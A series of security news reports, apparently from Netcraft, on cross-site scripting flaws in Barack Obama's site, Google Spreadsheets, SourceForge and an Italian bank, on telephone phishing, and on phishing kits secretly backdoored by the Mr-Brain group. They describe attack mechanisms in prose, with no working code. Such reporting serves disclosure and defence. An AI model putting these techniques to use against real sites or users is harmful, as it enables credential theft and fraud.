Hacker Redirects Barack Obama’s site to hillaryclinton.com

A security weakness in Barack Obama's website has been exploited to redirect visitors to Hillary Clinton's website. Visitors who viewed the Community Blogs section of the site were instead presented with Clinton's website as a result of a cross-site scripting vulnerability.

hillary.png
Barack Obama's visitors were redirected to this site.

A user named Mox, from Liverpool, IL, posted an apparent confession in the Community Blogs section on the Barack Obama website yesterday. The subject of the post was, "I am the one who "hacked" Obamas site."

Mox plays down the matter by saying that all he did was exploit some poorly written HTML code before suggesting that it was a cross-site scripting vulnerability that had been exploited. By allowing users to enter characters such as > and " into their blog URLs, JavaScript could be injected into pages in the Community Blogs section and would be executed by subsequent visitors.

A YouTube clip from zennie62 demonstrates the attack. The clip shows a user clicking on the Community Blogs section of the Barack Obama site, which subsequently causes the browser to redirect to hillaryclinton.com. The author speculates that "Senator Clinton's staffers possibly hired someone to hack into the Barack Obama website system." No evidence is offered to back up this statement.

obama-xss.png
Another vulnerability found on the Barack Obama site.

While Mox states that the original issue has now been fixed, a number of similar vulnerabilities have since been identified and remain unfixed, and are documented on xssed.com, which notes that such vulnerabilities open up opportunities to infect Obama's supporters and site visitors with malware, adware and spyware.

Google Spreadsheets vulnerability exposes IE users’ Gmail, Documents and more

An interesting cross-site scripting (XSS) vulnerability found in the Google Spreadsheets service would have allowed attackers to gain unauthorised access to other Google services, including Gmail and Google Docs.

The vulnerability was discovered by security engineer Billy Rios, and takes advantage of nuances in the way Internet Explorer handles Content-Types for webpages.

Google Spreadsheets XSS

When a spreadsheet is saved and downloaded in CSV format, the Content-Type is set to "text/plain", thereby instructing the client's browser that the document should be treated as plain text. However, if HTML tags are entered into the first cell of the spreadsheet, Internet Explorer detects these tags near the start of the CSV document and instead deduces that it should be treated as HTML. This essentially allowed arbitrary HTML webpages to be served from spreadsheets.google.com, which in turn allowed JavaScript to be executed in the context of the spreadsheets.google.com site. A remote attacker could exploit this weakness by stealing the user's session cookies and hijacking their session.

Rios points out that Google cookies are valid for all google.com sub domains. This means that when a user logs in to Gmail, the Gmail cookie is also valid for other Google services, such as Google Code, Google Docs, Google Spreadsheets, and more. Cross-site scripting vulnerabilities in any of these sub domains can allow an attacker to hijack a user's session and access other Google services as if they were that user.

Google has fixed the vulnerability discovered by Rios and there have been no reports of the vulnerability being exploited by attackers.

Extended Validation certificates and XSS considered harmful

A cross-site scripting vulnerability on the popular SourceForge.net website shows how Extended Validation SSL certificates could be exploited by fraudsters. Piggybacking on the anticipated extra trust instilled by the presence of an EV SSL certificate, arbitrary content could be injected onto the secure page at SourceForge to create a very convincing phishing attack. The green address bar displayed by the web browser would assure users that they are looking at a website that can be trusted, even though the page they are looking at may contain scripts or HTML created by a remote attacker.

ie7-resized.png
The vulnerable page at SourceForge, showing the green address bar and injected JavaScript being executed

Extended Validation SSL certificates were originally created as a direct response to the rise in internet fraud, with additional verification processes reducing the likelihood of erroneously issuing a certificate to an unauthorised party. Modern web browsers treat EV SSL certificates differently to ordinary SSL certificates, typically turning the address bar green to show that a site can be trusted. Once users are conditioned into thinking that green means good, this could prove harmful when an EV SSL site contains a cross-site scripting vulnerability.

The number of EV SSL certificates in use worldwide is still relatively small and has only recently risen above 4,000. SourceForge is a large open source software development website, with a high ranking amongst users of the Netcraft Toolbar, and uses a VeriSign Class 3 Extended Validation SSL certificate for its main secure site at https://sourceforge.net.

firefox-small.png
Nightly builds of Firefox also display the green address bar element

Both Internet Explorer 7 and recent nightly builds of the Mozilla Firefox web browser display a green address bar when accessing the vulnerable page at SourceForge, even when it is used to inject content that may have been created by a fraudster. Netcraft has informed SourceForge about this issue, although the xssed.com mirror, where this vulnerability was first discovered, suggests that it has remained unfixed since last year.

This discovery (believed to be the first documented case of XSS on an EV SSL website) highlights the need to remain wary of web application security, even when delivered with the most secure and trusted option of Extended Validation SSL certificates.

Netcraft offers extensive web application penetration and security testing services to identify vulnerabilities such as cross-site scripting.

Fraudster using phone numbers to receive authentication details

The Bank of Lancaster County is currently being targeted by a phishing attack that does away with the traditional web-based phishing forms. Instead, victims are asked to phone a toll free number to reactivate their card.

The scam is initiated by sending out phishing emails purporting that the victim's VISA card has been deactivated, stating that it may have been used in illegal activities. Rather than clicking on a hyperlink and visiting a website to resolve the problem, this phishing scam asks its victims to call a phone number based in Erie, Pennsylvania. To add credibility to the attack, the email claims that the phone number is toll free, but it is in fact not.

bankoflancaster.png

Stealing credentials via phone remains a relatively rare phishing technique. For scalability, attacks like these are usually carried out by sending emails rather than initiating phone calls, and request that the recipient calls a phone number which purportedly belongs to the bank.

Ironically, phone phishing could prove more effective due to the methods some banks use to combat fraud. Some make automated phone calls to cardholders in the event of suspicious transactions, with the cardholder being prompted to respond by entering personal details before confirming a transaction. In practice, the cardholder has no way of ascertaining that the phone call is really coming from their bank, and expecting the cardholder to trust the automated caller is effectively grooming the bank's customers into falling for phone based phishing attacks.

The Bank of Lancaster County has published an alert advising customers about fraudulent emails that contain phone numbers, which when called, ask for personal information including account passwords and credit card numbers.

Mr-Brain: Stealing Phish from Fraudsters

A recurrent group of Moroccan fraudsters calling themselves Mr-Brain has launched a website dedicated to offering easy-to-use phishing site code, email templates and other hacking tools. The website offers phishing kits for many of the most common targets, such as Bank of America, eBay, PayPal and HSBC.

The tools and code provided by Mr-Brain are designed to make it extremely easy for other fraudsters to deploy realistic phishing sites. Only a very basic knowledge of programming is required to configure the PHP scripts to send victims' details to the fraudsters' chosen electronic mail address. Deploying one of these fully working kits can be done in as little as one minute – another factor that adds to their appeal.

Tricking the Fraudsters

Mr-Brain's intentions are to encourage as many people as possible to use their phishing kits, for all is not what it seems at first glance. Careful inspection of the configuration script reveals deceptive code that hides the true set of electronic mail addresses that are contacted by the kit – every fraudster who uses these kits will unwittingly send a copy of each victim's details back to the Mr-Brain group.

scam-pages.png

The configuration script exploits the case-sensitivity in PHP variable names to disguise Mr-Brain’s electronic mail address as an unrelated but seemingly essential part of the script, encouraging fraudsters not to alter it. The injected electronic mail address is actually contained in a completely separate PHP file, where it is encrypted in a hidden input field named "niarB", or "Brain" backwards. Yet another PHP script reads the value from this input field and decrypts it before supplying it to the configuration script. Most fraudsters are unlikely to notice this level of obfuscation and will assume the script is working normally, as they will also receive a copy of any emails produced by the script.

When Netcraft decrypted the contents, the hidden input field revealed one of Mr-Brain's Gmail addresses, which is used to covertly capture details from all of the phishing kits that have been deployed on their behalf by other fraudsters. A comment at the top of one of the scripts aims to deter these fraudsters from examining the script that decrypts the hidden field:

scam-pages3.png

Earlier this month, Netcraft also exposed a similar phishing scam targeting Bank of America. This, too, was authored by Mr-Brain and was configured to covertly send harvested credentials to a different Gmail address.

scam-pages2.png

Each phishing kit listed on their website is accompanied by a description, showing what kind of information it steals from victims. One page on their website lists a selection of Social Security numbers, credit card numbers and PINs under the heading "Free and Freash [sic] Credit Card".

Mr-Brain claims that all of the scam pages offered on its site are undetected by Mozilla, Opera and Internet Explorer. Netcraft blocks these sites when they are detected by the Netcraft Toolbar community, and propagates the block to all companies which licence the Netcraft Phishing Site Feed.

Italian Bank’s XSS Opportunity Seized by Fraudsters

An extremely convincing phishing attack is using a cross-site scripting vulnerability on an Italian Bank's own website to attempt to steal customers' bank account details. Fraudsters are currently sending phishing mails which use a specially-crafted URL to inject a modified login form onto the bank's login page.

The vulnerable page is served over SSL with a bona fide SSL certificate issued to Banca Fideuram S.p.A. in Italy. Nonetheless, the fraudsters have been able to inject an IFRAME onto the login page which loads a modified login form from a web server hosted in Taiwan.

fideura.png
The fraudsters' login form presented inside the bank's SSL page.

This attack highlights the seriousness of cross-site scripting vulnerabilities on banking websites. It shows that security cannot be guaranteed just by the presence of "https" at the start of a URL, or checking that the browser address bar contains the correct domain name.

Cross-site scripting vulnerabilities on SSL sites also undermine the purpose of SSL certificates - while the attack detailed here injects external content via an IFRAME, it is important to note that a malicious payload could also be delivered solely via the vulnerable GET parameter. In the latter case, any SSL certificate associated with the site - included Extended Validation certificates - would display a padlock icon and apparently assure the user that the injected login form is genuine.

This particular attack is made all the more convincing by the vector used by the fraudsters: the URL employed by the attack injects a series of numbers directly into a JavaScript function call that already exists on the bank's LoginServlet page. This makes it difficult even for an experienced user to identify this as a cross-site scripting attack, as the URL does not look readily suspicious, with the injected content consisting only of numbers and commas.

fideura2.png
The vulnerable page, decoding arbitrary GET parameters.

In a possible attempt to bypass automated security filters, the injected content from Taiwan also contains encoded JavaScript which is used to display the text "Inserisci i tuoi codici personali" ("Insert your personal codes") and "per accedere alle aree riservate" ("To access all reserved areas"). When the modified form is submitted, the contents are transmitted to the Taiwanese server before the user is redirected to the bank's genuine, unaltered homepage.

Netcraft has contacted the bank affected by this attack and blocked the phishing site for all users of the Netcraft Toolbar, and propagated the block to the companies which licence the Netcraft PhishFeed.